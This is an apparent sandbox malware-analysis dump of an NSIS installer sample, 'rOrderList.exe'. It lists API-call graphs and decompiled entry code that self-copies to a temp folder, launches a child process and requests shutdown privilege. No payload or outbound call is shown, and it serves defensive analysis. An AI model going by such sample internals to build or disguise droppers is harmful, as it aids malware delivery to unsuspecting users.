3959->3965 3960->3959 3966 403b84 3965->3966 3967 403b4d 3966->3967 3968 403b89 FreeLibrary GlobalFree 3966->3968 3969 405c4e 3967->3969 3968->3967 3968->3968 3970 405f19 18 API calls 3969->3970 3971 405c6e 3970->3971 3972 405c76 DeleteFileW 3971->3972 3973 405c8d 3971->3973 4002 403b59 3972->4002 3974 405dad 3973->3974 4005 40653c lstrcpynW 3973->4005 3981 40689a 2 API calls 3974->3981 3974->4002 3976 405cb3 3977 405cc6 3976->3977 3978 405cb9 lstrcatW 3976->3978 3980 405e5d 2 API calls 3977->3980 3979 405ccc 3978->3979 3982 405cdc lstrcatW 3979->3982 3984 405ce7 lstrlenW FindFirstFileW 3979->3984 3980->3979 3983 405dd2 3981->3983 3982->3984 3985 405e11 3 API calls 3983->3985 3983->4002 3984->3974 3987 405d09 3984->3987 3986 405ddc 3985->3986 3989 405c06 5 API calls 3986->3989 3988 405d90 FindNextFileW 3987->3988 3998 405c4e 60 API calls 3987->3998 4000 4055a4 24 API calls 3987->4000 4003 4055a4 24 API calls 3987->4003 4004 406302 36 API calls 3987->4004 4006 40653c lstrcpynW 3987->4006 4007 405c06 3987->4007 3988->3987 3992 405da6 FindClose 3988->3992 3991 405de8 3989->3991 3993 405e02 3991->3993 3994 405dec 3991->3994 3992->3974 3996 4055a4 24 API calls 3993->3996 3997 4055a4 24 API calls 3994->3997 3994->4002 3996->4002 3999 405df9 3997->3999 3998->3987 4001 406302 36 API calls 3999->4001 4000->3988 4001->4002 4003->3987 4004->3987 4005->3976 4006->3987 4008 40600d 2 API calls 4007->4008 4009 405c12 4008->4009 4010 405c33 4009->4010 4011 405c21 RemoveDirectoryW 4009->4011 4012 405c29 DeleteFileW 4009->4012 4010->3987 4013 405c2f 4011->4013 4012->4013 4013->4010 4014 405c3f SetFileAttributesW 4013->4014 4014->4010 4723 401b9b 4724 401bec 4723->4724 4725 401ba8 4723->4725 4727 401bf1 4724->4727 4728 401c16 GlobalAlloc 4724->4728 4726 401c31 4725->4726 4731 401bbf 4725->4731 4729 406579 17 API calls 4726->4729 4737 402395 4726->4737 4727->4737 4744 40653c lstrcpynW 4727->4744 4730 406579 17 API calls 4728->4730 4732 40238f 4729->4732 4730->4726 4742 40653c lstrcpynW 4731->4742 4738 405ba2 MessageBoxIndirectW 4732->4738 4735 401c03 GlobalFree 4735->4737 4736 401bce 4743 40653c lstrcpynW 4736->4743 4738->4737 4740 401bdd 4745 40653c lstrcpynW 4740->4745 4742->4736 4743->4740 4744->4735 4745->4737 4746 402b9d SendMessageW 4747 402bb7 InvalidateRect 4746->4747 4748 402bc2 4746->4748 4747->4748 4749 40149e 4750 402395 4749->4750 4751 4014ac PostQuitMessage 4749->4751 4751->4750 3434 402522 3445 402d7e 3434->3445 3437 402d3e 17 API calls 3438 402535 3437->3438 3439 402540 RegQueryValueExW 3438->3439 3444 402925 3438->3444 3440 402560 3439->3440 3441 402566 RegCloseKey 3439->3441 3440->3441 3450 406483 wsprintfW 3440->3450 3441->3444 3446 402d3e 17 API calls 3445->3446 3447 402d95 3446->3447 3448 4063a9 RegOpenKeyExW 3447->3448 3449 40252c 3448->3449 3449->3437 3450->3441 4752 4021a2 4753 402d3e 17 API calls 4752->4753 4754 4021a9 4753->4754 4755 402d3e 17 API calls 4754->4755 4756 4021b3 4755->4756 4757 402d3e 17 API calls 4756->4757 4758 4021bd 4757->4758 4759 402d3e 17 API calls 4758->4759 4760 4021c7 4759->4760 4761 402d3e 17 API calls 4760->4761 4763 4021d1 4761->4763 4762 402210 CoCreateInstance 4767 40222f 4762->4767 4763->4762 4764 402d3e 17 API calls 4763->4764 4764->4762 4765 401423 24 API calls 4766 4022ee 4765->4766 4767->4765 4767->4766 3533 4015a3 3534 402d3e 17 API calls 3533->3534 3535 4015aa SetFileAttributesW 3534->3535 3536 4015bc 3535->3536 3537 401fa4 3538 402d3e 17 API calls 3537->3538 3539 401faa 3538->3539 3540 4055a4 24 API calls 3539->3540 3541 401fb4 3540->3541 3552 405b25 CreateProcessW 3541->3552 3544 401fdd CloseHandle 3547 402925 3544->3547 3548 401fcf 3549 401fd4 3548->3549 3550 401fdf 3548->3550 3560 406483 wsprintfW 3549->3560 3550->3544 3553 401fba 3552->3553 3554 405b58 CloseHandle 3552->3554 3553->3544 3553->3547 3555 4069dc WaitForSingleObject 3553->3555 3554->3553 3556 4069f6 3555->3556 3557 406a08 GetExitCodeProcess 3556->3557 3558 40696d 2 API calls 3556->3558 3557->3548 3559 4069fd WaitForSingleObject 3558->3559 3559->3556 3560->3544 3562 4023aa 3563 4023b2 3562->3563 3566 4023b8 3562->3566 3564 402d3e 17 API calls 3563->3564 3564->3566 3565 4023c6 3568 4023d4 3565->3568 3570 402d3e 17 API calls 3565->3570 3566->3565 3567 402d3e 17 API calls 3566->3567 3567->3565 3569 402d3e 17 API calls 3568->3569 3571 4023dd WritePrivateProfileStringW 3569->3571 3570->3568 4775 40202a 4776 402d3e 17 API calls 4775->4776 4777 402031 4776->4777 4778 406931 5 API calls 4777->4778 4779 402040 4778->4779 4780 4020c4 4779->4780 4781 40205c GlobalAlloc 4779->4781 4781->4780 4782 402070 4781->4782 4783 406931 5 API calls 4782->4783 4784 402077 4783->4784 4785 406931 5 API calls 4784->4785 4786 402081 4785->4786 4786->4780 4790 406483 wsprintfW 4786->4790 4788 4020b6 4791 406483 wsprintfW 4788->4791 4790->4788 4791->4780 4792 402f2b 4793 402f56 4792->4793 4794 402f3d SetTimer 4792->4794 4795 402fa4 4793->4795 4796 402faa MulDiv 4793->4796 4794->4793 4797 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4796->4797 4797->4795 3579 40242c 3580 402434 3579->3580 3581 40245f 3579->3581 3582 402d7e 17 API calls 3580->3582 3583 402d3e 17 API calls 3581->3583 3584 40243b 3582->3584 3585 402466 3583->3585 3586 402445 3584->3586 3589 402473 3584->3589 3591 402dfc 3585->3591 3588 402d3e 17 API calls 3586->3588 3590 40244c RegDeleteValueW RegCloseKey 3588->3590 3590->3589 3592 402e10 3591->3592 3594 402e09 3591->3594 3592->3594 3595 402e41 3592->3595 3594->3589 3596 4063a9 RegOpenKeyExW 3595->3596 3597 402e6f 3596->3597 3598 402f24 3597->3598 3599 402e79 3597->3599 3598->3594 3600 402e7f RegEnumValueW 3599->3600 3604 402ea2 3599->3604 3601 402f09 RegCloseKey 3600->3601 3600->3604 3601->3598 3602 402ede RegEnumKeyW 3603 402ee7 RegCloseKey 3602->3603 3602->3604 3605 406931 5 API calls 3603->3605 3604->3601 3604->3602 3604->3603 3606 402e41 6 API calls 3604->3606 3607 402ef7 3605->3607 3606->3604 3608 402f19 3607->3608 3609 402efb RegDeleteKeyW 3607->3609 3608->3598 3609->3598 4799 401a30 4800 402d3e 17 API calls 4799->4800 4801 401a39 ExpandEnvironmentStringsW 4800->4801 4802 401a60 4801->4802 4803 401a4d 4801->4803 4803->4802 4804 401a52 lstrcmpW 4803->4804 4804->4802 4810 401735 4811 402d3e 17 API calls 4810->4811 4812 40173c SearchPathW 4811->4812 4813 401757 4812->4813 4814 402636 4815 402665 4814->4815 4816 40264a 4814->4816 4817 402695 4815->4817 4818 40266a 4815->4818 4819 402d1c 17 API calls 4816->4819 4821 402d3e 17 API calls 4817->4821 4820 402d3e 17 API calls 4818->4820 4826 402651 4819->4826 4822 402671 4820->4822 4823 40269c lstrlenW 4821->4823 4831 40655e WideCharToMultiByte 4822->4831 4823->4826 4825 402685 lstrlenA 4825->4826 4827 4026df 4826->4827 4828 4026c9 4826->4828 4830 406113 5 API calls 4826->4830 4828->4827 4829 4060e4 WriteFile 4828->4829 4829->4827 4830->4828 4831->4825 4832 401d38 4833 402d1c 17 API calls 4832->4833 4834 401d3f 4833->4834 4835 402d1c 17 API calls 4834->4835 4836 401d4b GetDlgItem 4835->4836 4837 402630 4836->4837 4838 4014b8 4839 4014be 4838->4839 4840 401389 2 API calls 4839->4840 4841 4014c6 4840->4841 4015 403fb9 4016 403fd1 4015->4016 4017 40410c 4015->4017 4016->4017 4018 403fdd 4016->4018 4019 40411d GetDlgItem GetDlgItem 4017->4019 4028 40415d 4017->4028 4020 403fe8 SetWindowPos 4018->4020 4021 403ffb 4018->4021 4022 404492 18 API calls 4019->4022 4020->4021 4025 404000 ShowWindow 4021->4025 4026 404018 4021->4026 4027 404147 SetClassLongW 4022->4027 4023 4041b7 4024 4044de SendMessageW 4023->4024 4029 404107 4023->4029 4056 4041c9 4024->4056 4025->4026 4030 404020 DestroyWindow 4026->4030 4031 40403a 4026->4031 4032 40140b 2 API calls 4027->4032 4028->4023 4033 401389 2 API calls 4028->4033 4034 40441b 4030->4034 4035 404050 4031->4035 4036 40403f SetWindowLongW 4031->4036 4032->4028 4037 40418f 4033->4037 4034->4029 4044 40444c ShowWindow 4034->4044 4041 4040f9 4035->4041 4042 40405c GetDlgItem 4035->4042 4036->4029 4037->4023 4038 404193 SendMessageW 4037->4038 4038->4029 4039 40140b 2 API calls 4039->4056 4040 40441d DestroyWindow KiUserCallbackDispatcher 4040->4034 4043 4044f9 8 API calls 4041->4043 4045 40408c 4042->4045 4046 40406f SendMessageW IsWindowEnabled 4042->4046 4043->4029 4044->4029 4048 404099 4045->4048 4049 4040e0 SendMessageW 4045->4049 4050 4040ac 4045->4050 4059 404091 4045->4059 4046->4029 4046->4045 4047 406579 17 API calls 4047->4056 4048->4049 4048->4059 4049->4041 4053 4040b4 4050->4053 4054 4040c9 4050->4054 4051 40446b SendMessageW 4055 4040c7 4051->4055 4052 404492 18 API calls 4052->4056 4057 40140b 2 API calls 4053->4057 4058 40140b 2 API calls 4054->4058 4055->4041 4056->4029 4056->4039 4056->4040 4056->4047 4056->4052 4061 404492 18 API calls 4056->4061 4077 40435d DestroyWindow 4056->4077 4057->4059 4060 4040d0 4058->4060 4059->4051 4060->4041 4060->4059 4062 404244 GetDlgItem 4061->4062 4063 404261 ShowWindow KiUserCallbackDispatcher 4062->4063 4064 404259 4062->4064 4086 4044b4 KiUserCallbackDispatcher 4063->4086 4064->4063 4066 40428b EnableWindow 4071 40429f 4066->4071 4067 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4068 4042d4 SendMessageW 4067->4068 4067->4071 4068->4071 4070 403f9a 18 API calls 4070->4071 4071->4067 4071->4070 4087 4044c7 SendMessageW 4071->4087 4088 40653c lstrcpynW 4071->4088 4073 404303 lstrlenW 4074 406579 17 API calls 4073->4074 4075 404319 SetWindowTextW 4074->4075 4076 401389 2 API calls 4075->4076 4076->4056 4077->4034 4078 404377 CreateDialogParamW 4077->4078 4078->4034 4079 4043aa 4078->4079 4080 404492 18 API calls 4079->4080 4081 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4080->4081 4082 401389 2 API calls 4081->4082 4083 4043fb 4082->4083 4083->4029 4084 404403 ShowWindow 4083->4084 4085 4044de SendMessageW 4084->4085 4085->4034 4086->4066 4087->4071 4088->4073 4842 4028bb 4843 4028c1 4842->4843 4844 402bc2 4843->4844 4845 4028c9 FindClose 4843->4845 4845->4844 4846 40493c 4847 404972 4846->4847 4848 40494c 4846->4848 4850 4044f9 8 API calls 4847->4850 4849 404492 18 API calls 4848->4849 4852 404959 SetDlgItemTextW 4849->4852 4851 40497e 4850->4851 4852->4847

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 4035d8-403615 SetErrorMode GetVersion 1 403617-40361f call 406931 0->1 2 403628 0->2 1->2 8 403621 1->8 3 40362d-403641 call 4068c1 lstrlenA 2->3 9 403643-40365f call 406931 * 3 3->9 8->2 16 403670-4036cf #17 OleInitialize SHGetFileInfoW call 40653c GetCommandLineW call 40653c 9->16 17 403661-403667 9->17 24 4036d1-4036d8 16->24 25 4036d9-4036f3 call 405e3e CharNextW 16->25 17->16 22 403669 17->22 22->16 24->25 28 4036f9-4036ff 25->28 29 40380a-403824 GetTempPathW call 4035a7 25->29 31 403701-403706 28->31 32 403708-40370c 28->32 36 403826-403844 GetWindowsDirectoryW lstrcatW call 4035a7 29->36 37 40387c-403896 DeleteFileW call 403068 29->37 31->31 31->32 34 403713-403717 32->34 35 40370e-403712 32->35 38 4037d6-4037e3 call 405e3e 34->38 39 40371d-403723 34->39 35->34 36->37 54 403846-403876 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4035a7 36->54 57 403947-403957 ExitProcess OleUninitialize 37->57 58 40389c-4038a2 37->58 55 4037e5-4037e6 38->55 56 4037e7-4037ed 38->56 43 403725-40372d 39->43 44 40373e-403777 39->44 50 403734 43->50 51 40372f-403732 43->51 45 403794-4037ce 44->45 46 403779-40377e 44->46 45->38 53 4037d0-4037d4 45->53 46->45 52 403780-403788 46->52 50->44 51->44 51->50 61 40378a-40378d 52->61 62 40378f 52->62 53->38 63 4037f5-403803 call 40653c 53->63 54->37 54->57 55->56 56->28 65 4037f3 56->65 59 403a7d-403a83 57->59 60 40395d-40396d call 405ba2 ExitProcess 57->60 66 403937-40393e call 403c0b 58->66 67 4038a8-4038b3 call 405e3e 58->67 69 403b01-403b09 59->69 70 403a85-403a9b GetCurrentProcess OpenProcessToken 59->70 61->45 61->62 62->45 72 403808 63->72 65->72 76 403943 66->76 83 403901-40390b 67->83 84 4038b5-4038ea 67->84 77 403b0b 69->77 78 403b0f-403b13 ExitProcess 69->78 80 403ad1-403adf call 406931 70->80 81 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 70->81 72->29 76->57 77->78 94 403ae1-403aeb 80->94 95 403aed-403af8 ExitWindowsEx 80->95 81->80 87 403973-403987 call 405b0d lstrcatW 83->87 88 40390d-40391b call 405f19 83->88 86 4038ec-4038f0 84->86 90 4038f2-4038f7 86->90 91 4038f9-4038fd 86->91 101 403994-4039ae lstrcatW lstrcmpiW 87->101 102 403989-40398f lstrcatW 87->102 88->57 103 40391d-403933 call 40653c * 2 88->103 90->91 97 4038ff 90->97 91->86 91->97 94->95 96 403afa-403afc call 40140b 94->96 95->69 95->96 96->69 97->83 101->57 105 4039b0-4039b3 101->105 102->101 103->66 107 4039b5-4039ba call 405a73 105->107 108 4039bc call 405af0 105->108 113 4039c1-4039cf SetCurrentDirectoryW 107->113 108->113 116 4039d1-4039d7 call 40653c 113->116 117 4039dc-403a05 call 40653c 113->117 116->117 121 403a0a-403a26 call 406579 DeleteFileW 117->121 124 403a67-403a6f 121->124 125 403a28-403a38 CopyFileW 121->125 124->121 126 403a71-403a78 call 406302 124->126 125->124 127 403a3a-403a5a call 406302 call 406579 call 405b25 125->127 126->57 127->124 136 403a5c-403a63 CloseHandle 127->136 136->124
                                                                                      C-Code - Quality: 79%
                                                                                      			_entry_() {
                                                                                      				signed int _t51;
                                                                                      				intOrPtr* _t56;
                                                                                      				WCHAR* _t60;
                                                                                      				char* _t62;
                                                                                      				void* _t65;
                                                                                      				void* _t67;
                                                                                      				int _t69;
                                                                                      				int _t70;
                                                                                      				int _t73;
                                                                                      				intOrPtr* _t74;
                                                                                      				int _t75;
                                                                                      				int _t77;
                                                                                      				void* _t101;
                                                                                      				signed int _t118;
                                                                                      				void* _t121;
                                                                                      				void* _t126;
                                                                                      				intOrPtr _t145;
                                                                                      				intOrPtr _t146;
                                                                                      				intOrPtr* _t147;
                                                                                      				int _t149;
                                                                                      				void* _t152;
                                                                                      				int _t153;
                                                                                      				signed int _t157;
                                                                                      				signed int _t162;
                                                                                      				signed int _t167;
                                                                                      				void* _t169;
                                                                                      				void* _t171;
                                                                                      				int* _t173;
                                                                                      				signed int _t179;
                                                                                      				signed int _t182;
                                                                                      				CHAR* _t183;
                                                                                      				WCHAR* _t184;
                                                                                      				void* _t190;
                                                                                      				char* _t191;
                                                                                      				void* _t194;
                                                                                      				void* _t195;
                                                                                      				void* _t241;
                                                                                      
                                                                                      				_t169 = 0x20;
                                                                                      				_t149 = 0;
                                                                                      				 *(_t195 + 0x14) = 0;
                                                                                      				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                      				 *(_t195 + 0x1c) = 0;
                                                                                      				SetErrorMode(0x8001); // executed
                                                                                      				_t51 = GetVersion() & 0xbfffffff;
                                                                                      				 *0x42a26c = _t51;
                                                                                      				if(_t51 != 6) {
                                                                                      					_t147 = E00406931(0);
                                                                                      					if(_t147 != 0) {
                                                                                      						 *_t147(0xc00);
                                                                                      					}
                                                                                      				}
                                                                                      				_t183 = "UXTHEME";
                                                                                      				goto L4;
                                                                                      				L8:
                                                                                      				__imp__#17(_t190);
                                                                                      				__imp__OleInitialize(_t149); // executed
                                                                                      				 *0x42a338 = _t56;
                                                                                      				SHGetFileInfoW(0x421708, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
                                                                                      				E0040653C(0x429260, L"NSIS Error");
                                                                                      				_t60 = GetCommandLineW();
                                                                                      				_t191 = L"\"C:\\Users\\Arthur\\Desktop\\rOrderList.exe\"";
                                                                                      				E0040653C(_t191, _t60);
                                                                                      				 *0x42a260 = 0x400000;
                                                                                      				_t62 = _t191;
                                                                                      				if(L"\"C:\\Users\\Arthur\\Desktop\\rOrderList.exe\"" == 0x22) {
                                                                                      					_t62 =  &M00435002;
                                                                                      					_t169 = 0x22;
                                                                                      				}
                                                                                      				_t153 = CharNextW(E00405E3E(_t62, _t169));
                                                                                      				 *(_t195 + 0x18) = _t153;
                                                                                      				_t65 =  *_t153;
                                                                                      				if(_t65 == _t149) {
                                                                                      					L33:
                                                                                      					_t184 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                      					GetTempPathW(0x400, _t184);
                                                                                      					_t67 = E004035A7(_t153, 0);
                                                                                      					_t223 = _t67;
                                                                                      					if(_t67 != 0) {
                                                                                      						L36:
                                                                                      						DeleteFileW(L"1033"); // executed
                                                                                      						_t69 = E00403068(_t225,  *(_t195 + 0x1c)); // executed
                                                                                      						 *(_t195 + 0x10) = _t69;
                                                                                      						if(_t69 != _t149) {
                                                                                      							L48:
                                                                                      							ExitProcess(); // executed
                                                                                      							__imp__OleUninitialize(); // executed
                                                                                      							_t237 =  *(_t195 + 0x10) - _t149;
                                                                                      							if( *(_t195 + 0x10) == _t149) {
                                                                                      								__eflags =  *0x42a314 - _t149;
                                                                                      								if( *0x42a314 == _t149) {
                                                                                      									L72:
                                                                                      									_t70 =  *0x42a32c;
                                                                                      									__eflags = _t70 - 0xffffffff;
                                                                                      									if(_t70 != 0xffffffff) {
                                                                                      										 *(_t195 + 0x10) = _t70;
                                                                                      									}
                                                                                      									ExitProcess( *(_t195 + 0x10));
                                                                                      								}
                                                                                      								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
                                                                                      								__eflags = _t73;
                                                                                      								if(_t73 != 0) {
                                                                                      									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
                                                                                      									 *(_t195 + 0x34) = 1;
                                                                                      									 *(_t195 + 0x40) = 2;
                                                                                      									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
                                                                                      								}
                                                                                      								_t74 = E00406931(4);
                                                                                      								__eflags = _t74 - _t149;
                                                                                      								if(_t74 == _t149) {
                                                                                      									L70:
                                                                                      									_t75 = ExitWindowsEx(2, 0x80040002);
                                                                                      									__eflags = _t75;
                                                                                      									if(_t75 != 0) {
                                                                                      										goto L72;
                                                                                      									}
                                                                                      									goto L71;
                                                                                      								} else {
                                                                                      									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
                                                                                      									__eflags = _t77;
                                                                                      									if(_t77 == 0) {
                                                                                      										L71:
                                                                                      										E0040140B(9);
                                                                                      										goto L72;
                                                                                      									}
                                                                                      									goto L70;
                                                                                      								}
                                                                                      							}
                                                                                      							E00405BA2( *(_t195 + 0x10), 0x200010);
                                                                                      							ExitProcess(2);
                                                                                      						}
                                                                                      						if( *0x42a280 == _t149) {
                                                                                      							L47:
                                                                                      							 *0x42a32c =  *0x42a32c | 0xffffffff;
                                                                                      							 *(_t195 + 0x14) = E00403C0B( *0x42a32c);
                                                                                      							goto L48;
                                                                                      						}
                                                                                      						_t173 = E00405E3E(_t191, _t149);
                                                                                      						if(_t173 < _t191) {
                                                                                      							L44:
                                                                                      							_t234 = _t173 - _t191;
                                                                                      							 *(_t195 + 0x10) = L"Error launching installer";
                                                                                      							if(_t173 < _t191) {
                                                                                      								_t171 = E00405B0D(_t237);
                                                                                      								lstrcatW(_t184, L"~nsu");
                                                                                      								if(_t171 != _t149) {
                                                                                      									lstrcatW(_t184, "A");
                                                                                      								}
                                                                                      								lstrcatW(_t184, L".tmp");
                                                                                      								_t193 = L"C:\\Users\\Arthur\\Desktop";
                                                                                      								if(lstrcmpiW(_t184, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                                      									_push(_t184);
                                                                                      									if(_t171 == _t149) {
                                                                                      										E00405AF0();
                                                                                      									} else {
                                                                                      										E00405A73();
                                                                                      									}
                                                                                      									SetCurrentDirectoryW(_t184);
                                                                                      									_t241 = L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege" - _t149; // 0x43
                                                                                      									if(_t241 == 0) {
                                                                                      										E0040653C(L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege", _t193);
                                                                                      									}
                                                                                      									E0040653C(0x42b000,  *(_t195 + 0x18));
                                                                                      									_t154 = "A" & 0x0000ffff;
                                                                                      									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                      									_t194 = 0x1a;
                                                                                      									do {
                                                                                      										E00406579(_t149, 0x420f08, _t184, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x120)));
                                                                                      										DeleteFileW(0x420f08);
                                                                                      										if( *(_t195 + 0x10) != _t149 && CopyFileW(0x438800, 0x420f08, 1) != 0) {
                                                                                      											E00406302(_t154, 0x420f08, _t149);
                                                                                      											E00406579(_t149, 0x420f08, _t184, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x124)));
                                                                                      											_t101 = E00405B25(0x420f08);
                                                                                      											if(_t101 != _t149) {
                                                                                      												CloseHandle(_t101);
                                                                                      												 *(_t195 + 0x10) = _t149;
                                                                                      											}
                                                                                      										}
                                                                                      										 *0x42b800 =  *0x42b800 + 1;
                                                                                      										_t194 = _t194 - 1;
                                                                                      									} while (_t194 != 0);
                                                                                      									E00406302(_t154, _t184, _t149);
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							 *_t173 = _t149;
                                                                                      							_t174 =  &(_t173[2]);
                                                                                      							if(E00405F19(_t234,  &(_t173[2])) == 0) {
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							E0040653C(L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege", _t174);
                                                                                      							E0040653C(L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege\\Willness", _t174);
                                                                                      							 *(_t195 + 0x10) = _t149;
                                                                                      							goto L47;
                                                                                      						}
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                      						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                      						while( *_t173 != _t157 || _t173[1] != _t118) {
                                                                                      							_t173 = _t173;
                                                                                      							if(_t173 >= _t191) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      						_t149 = 0;
                                                                                      						goto L44;
                                                                                      					}
                                                                                      					GetWindowsDirectoryW(_t184, 0x3fb);
                                                                                      					lstrcatW(_t184, L"\\Temp");
                                                                                      					_t121 = E004035A7(_t153, _t223);
                                                                                      					_t224 = _t121;
                                                                                      					if(_t121 != 0) {
                                                                                      						goto L36;
                                                                                      					}
                                                                                      					GetTempPathW(0x3fc, _t184);
                                                                                      					lstrcatW(_t184, L"Low");
                                                                                      					SetEnvironmentVariableW(L"TEMP", _t184);
                                                                                      					SetEnvironmentVariableW(L"TMP", _t184);
                                                                                      					_t126 = E004035A7(_t153, _t224);
                                                                                      					_t225 = _t126;
                                                                                      					if(_t126 == 0) {
                                                                                      						goto L48;
                                                                                      					}
                                                                                      					goto L36;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t152 = 0x20;
                                                                                      						if(_t65 != _t152) {
                                                                                      							L13:
                                                                                      							if( *_t153 == 0x22) {
                                                                                      								_t153 = _t153 + 2;
                                                                                      								_t152 = 0x22;
                                                                                      							}
                                                                                      							if( *_t153 != 0x2f) {
                                                                                      								goto L27;
                                                                                      							} else {
                                                                                      								_t153 = _t153 + 2;
                                                                                      								if( *_t153 == 0x53) {
                                                                                      									_t146 =  *((intOrPtr*)(_t153 + 2));
                                                                                      									if(_t146 == 0x20 || _t146 == 0) {
                                                                                      										 *0x42a320 = 1;
                                                                                      									}
                                                                                      								}
                                                                                      								asm("cdq");
                                                                                      								asm("cdq");
                                                                                      								_t167 = L"NCRC" & 0x0000ffff;
                                                                                      								asm("cdq");
                                                                                      								_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
                                                                                      								if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
                                                                                      									_t145 =  *((intOrPtr*)(_t153 + 8));
                                                                                      									if(_t145 == 0x20 || _t145 == 0) {
                                                                                      										 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
                                                                                      									}
                                                                                      								}
                                                                                      								asm("cdq");
                                                                                      								asm("cdq");
                                                                                      								_t162 = L" /D=" & 0x0000ffff;
                                                                                      								asm("cdq");
                                                                                      								_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
                                                                                      								if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
                                                                                      									goto L27;
                                                                                      								} else {
                                                                                      									 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
                                                                                      									__eflags = _t153;
                                                                                      									E0040653C(L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege", _t153);
                                                                                      									L32:
                                                                                      									_t149 = 0;
                                                                                      									goto L33;
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						do {
                                                                                      							L12:
                                                                                      							_t153 = _t153 + 2;
                                                                                      						} while ( *_t153 == _t152);
                                                                                      						goto L13;
                                                                                      						L27:
                                                                                      						_t153 = E00405E3E(_t153, _t152);
                                                                                      						if( *_t153 == 0x22) {
                                                                                      							_t153 = _t153 + 2;
                                                                                      						}
                                                                                      						_t65 =  *_t153;
                                                                                      					} while (_t65 != 0);
                                                                                      					goto L32;
                                                                                      				}
                                                                                      				L4:
                                                                                      				E004068C1(_t183); // executed
                                                                                      				_t183 =  &(_t183[lstrlenA(_t183) + 1]);
                                                                                      				if( *_t183 != 0) {
                                                                                      					goto L4;
                                                                                      				} else {
                                                                                      					E00406931(0xb);
                                                                                      					 *0x42a264 = E00406931(9);
                                                                                      					_t56 = E00406931(7);
                                                                                      					if(_t56 != _t149) {
                                                                                      						_t56 =  *_t56(0x1e);
                                                                                      						if(_t56 != 0) {
                                                                                      							 *0x42a26f =  *0x42a26f | 0x00000040;
                                                                                      						}
                                                                                      					}
                                                                                      					goto L8;
                                                                                      				}
                                                                                      			}








































                                                                                      0x004035e3
                                                                                      0x004035e4
                                                                                      0x004035eb
                                                                                      0x004035ef
                                                                                      0x004035f7
                                                                                      0x004035fb
                                                                                      0x00403607
                                                                                      0x00403610
                                                                                      0x00403615
                                                                                      0x00403618
                                                                                      0x0040361f
                                                                                      0x00403626
                                                                                      0x00403626
                                                                                      0x0040361f
                                                                                      0x00403628
                                                                                      0x00403628
                                                                                      0x00403670
                                                                                      0x00403671
                                                                                      0x00403678
                                                                                      0x0040367e
                                                                                      0x00403694
                                                                                      0x004036a4
                                                                                      0x004036a9
                                                                                      0x004036af
                                                                                      0x004036b6
                                                                                      0x004036c3
                                                                                      0x004036cd
                                                                                      0x004036cf
                                                                                      0x004036d3
                                                                                      0x004036d8
                                                                                      0x004036d8
                                                                                      0x004036e7
                                                                                      0x004036e9
                                                                                      0x004036ed
                                                                                      0x004036f3
                                                                                      0x0040380a
                                                                                      0x00403810
                                                                                      0x0040381b
                                                                                      0x0040381d
                                                                                      0x00403822
                                                                                      0x00403824
                                                                                      0x0040387c
                                                                                      0x00403881
                                                                                      0x0040388b
                                                                                      0x00403892
                                                                                      0x00403896
                                                                                      0x00403947
                                                                                      0x00403947
                                                                                      0x0040394c
                                                                                      0x00403952
                                                                                      0x00403957
                                                                                      0x00403a7d
                                                                                      0x00403a83
                                                                                      0x00403b01
                                                                                      0x00403b01
                                                                                      0x00403b06
                                                                                      0x00403b09
                                                                                      0x00403b0b
                                                                                      0x00403b0b
                                                                                      0x00403b13
                                                                                      0x00403b13
                                                                                      0x00403a93
                                                                                      0x00403a99
                                                                                      0x00403a9b
                                                                                      0x00403aa8
                                                                                      0x00403abb
                                                                                      0x00403ac3
                                                                                      0x00403acb
                                                                                      0x00403acb
                                                                                      0x00403ad3
                                                                                      0x00403ad8
                                                                                      0x00403adf
                                                                                      0x00403aed
                                                                                      0x00403af0
                                                                                      0x00403af6
                                                                                      0x00403af8
                                                                                      0x00000000
                                                                                      0x00000000
